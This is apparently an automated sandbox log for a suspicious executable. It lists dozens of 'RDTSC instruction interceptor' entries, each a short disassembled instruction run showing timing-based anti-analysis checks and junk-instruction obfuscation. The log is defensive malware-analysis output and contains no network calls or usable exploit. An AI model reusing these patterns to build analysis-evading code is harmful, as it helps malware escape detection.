Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 793B57 second address: 793B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d jo 00007FF628B6958Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 796CA4 second address: 796CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 796CA9 second address: 796D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF628B69586h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e ja 00007FF628B6958Ah 0x00000014 nop 0x00000015 call 00007FF628B69590h 0x0000001a jng 00007FF628B6959Fh 0x00000020 pop ebx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007FF628B69588h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d push 00000000h 0x0000003f mov edi, 030433AFh 0x00000044 xchg eax, esi 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 796D23 second address: 796D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 796D27 second address: 796D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 796D2B second address: 796D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF628D73F5Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 793DCC second address: 793DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FF628B6958Ch 0x00000010 jng 00007FF628B69586h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 794D9F second address: 794DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 792C73 second address: 792C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 797DE0 second address: 797DEA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628D73F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 79905B second address: 799060 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 799F73 second address: 799F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 79C931 second address: 79C94E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF628B69593h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 79C94E second address: 79C967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F65h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 79C967 second address: 79C96B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 79C96B second address: 79C99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF628D73F68h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jng 00007FF628D73F7Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FF628D73F56h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 79C99B second address: 79C99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7A1F9E second address: 7A1FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7A1FA2 second address: 7A1FC6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF628B69586h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FF628B6958Eh 0x00000012 pop eax 0x00000013 pushad 0x00000014 jp 00007FF628B6958Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7A1FC6 second address: 7A1FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF628D73F64h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7A1FE0 second address: 7A2001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007FF628B69586h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7A2001 second address: 7A2007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7A9F5F second address: 7A9F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF628B6958Eh 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 jmp 00007FF628B6958Dh 0x00000015 pop esi 0x00000016 mov eax, dword ptr [eax] 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007FF628B69586h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AA06F second address: 7AA07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF628D73F56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AA07A second address: 7AA0A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FF628B69588h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AA0A1 second address: 7AA0C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007FF628D73F56h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AA0C2 second address: 7AA0EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnp 00007FF628B69592h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FF628B6958Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEA87 second address: 7AEA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FF628D73F56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEA96 second address: 7AEA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEA9B second address: 7AEAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F60h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEAB1 second address: 7AEAB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEAB5 second address: 7AEAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEAC2 second address: 7AEADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF628B6958Ch 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEADB second address: 7AEAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEAE1 second address: 7AEAF5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF628B6958Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AED43 second address: 7AED4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FF628D73F56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AED4F second address: 7AED97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF628B6958Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 jnc 00007FF628B69586h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 ja 00007FF628B6958Ch 0x0000001f jnl 00007FF628B69586h 0x00000025 push edx 0x00000026 jng 00007FF628B69586h 0x0000002c pop edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007FF628B69597h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEF11 second address: 7AEF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628D73F69h 0x00000009 popad 0x0000000a jmp 00007FF628D73F65h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEF47 second address: 7AEF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FF628B69586h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEF56 second address: 7AEF73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F63h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEF73 second address: 7AEF77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7AEF77 second address: 7AEF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B4A2C second address: 7B4A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B4A38 second address: 7B4A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B4A3C second address: 7B4A46 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B3EEB second address: 7B3F1A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF628D73F62h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FF628D73F61h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B3F1A second address: 7B3F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B42ED second address: 7B42F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B42F2 second address: 7B42FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B472D second address: 7B4731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B4731 second address: 7B4755 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e jbe 00007FF628B6958Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007FF628B69586h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B4755 second address: 7B4759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B4759 second address: 7B4770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF628B69586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e push ebx 0x0000000f jo 00007FF628B69586h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 745EB8 second address: 745EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B7F4F second address: 7B7F5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B7F5B second address: 7B7F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B7F5F second address: 7B7F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786B1C second address: 786B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786B21 second address: 5C7F11 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF628B6958Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jnc 00007FF628B69594h 0x00000013 push dword ptr [ebp+122D14DDh] 0x00000019 mov dword ptr [ebp+122D28EAh], eax 0x0000001f call dword ptr [ebp+122D1F1Fh] 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D1CE9h], ebx 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f mov di, B370h 0x00000033 or dword ptr [ebp+122D20C9h], ebx 0x00000039 popad 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e pushad 0x0000003f mov ah, 48h 0x00000041 mov esi, dword ptr [ebp+122D2CD1h] 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D2DB9h], eax 0x0000004e stc 0x0000004f stc 0x00000050 mov esi, 0000003Ch 0x00000055 jmp 00007FF628B69594h 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e stc 0x0000005f cld 0x00000060 lodsw 0x00000062 add dword ptr [ebp+122D1CE9h], ecx 0x00000068 jmp 00007FF628B6958Ah 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jns 00007FF628B69592h 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b stc 0x0000007c mov dword ptr [ebp+122D1CE9h], ebx 0x00000082 nop 0x00000083 je 00007FF628B69592h 0x00000089 jnp 00007FF628B6958Ch 0x0000008f push eax 0x00000090 push eax 0x00000091 push edx 0x00000092 jmp 00007FF628B69593h 0x00000097 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786BA8 second address: 786BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786BBB second address: 786BD5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF628B69588h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FF628B69586h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786BD5 second address: 786BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786BEE second address: 786C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c jmp 00007FF628B6958Ch 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jmp 00007FF628B69594h 0x0000001b pop eax 0x0000001c or dh, 00000000h 0x0000001f call 00007FF628B69589h 0x00000024 jnl 00007FF628B69594h 0x0000002a push eax 0x0000002b jmp 00007FF628B6958Ch 0x00000030 pop eax 0x00000031 push eax 0x00000032 jmp 00007FF628B6958Dh 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b push esi 0x0000003c jnp 00007FF628B6958Ch 0x00000042 pop esi 0x00000043 mov eax, dword ptr [eax] 0x00000045 jmp 00007FF628B6958Bh 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jnp 00007FF628B6958Ch 0x00000056 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786C89 second address: 786C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786E49 second address: 786E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FF628B6958Eh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786E67 second address: 786E6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 786E6C second address: 786E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7876AE second address: 7876DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007FF628D73F64h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7876DF second address: 7876EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78788C second address: 7878A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628D73F58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007FF628D73F58h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7878A6 second address: 768086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF628B69588h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 pushad 0x00000023 jmp 00007FF628B69596h 0x00000028 call 00007FF628B69590h 0x0000002d mov dword ptr [ebp+122D2366h], edi 0x00000033 pop ebx 0x00000034 popad 0x00000035 call dword ptr [ebp+12460AC4h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jnp 00007FF628B6958Ch 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 768086 second address: 76808A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76808A second address: 76808F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B866A second address: 7B866E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 78670E second address: 786A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xchg eax, ebx 0x00000006 mov dword ptr [ebp+122D22D0h], edx 0x0000000c jg 00007FF628B6958Ch 0x00000012 xor dword ptr [ebp+122D353Eh], ebx 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FF628B69588h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 mov ecx, dword ptr [ebp+122D2C6Dh] 0x0000003f adc dl, FFFFFFB2h 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 push eax 0x0000004a sub dword ptr [ebp+122D353Eh], edi 0x00000050 pop ecx 0x00000051 mov dword ptr [ebp+1249236Ah], esp 0x00000057 jmp 00007FF628B69596h 0x0000005c cmp dword ptr [ebp+122D2EBDh], 00000000h 0x00000063 jne 00007FF628B69627h 0x00000069 cmp dword ptr [ebp+122D2D09h], 00000000h 0x00000070 jne 00007FF628B6966Eh 0x00000076 cmp dword ptr [ebp+122D2CE5h], 00000000h 0x0000007d jne 00007FF628B6964Bh 0x00000083 mov byte ptr [ebp+122D37EBh], 0000006Ch 0x0000008a mov cx, di 0x0000008d mov eax, DB057083h 0x00000092 movzx ecx, dx 0x00000095 nop 0x00000096 pushad 0x00000097 push eax 0x00000098 push edx 0x00000099 pushad 0x0000009a popad 0x0000009b rdtsc
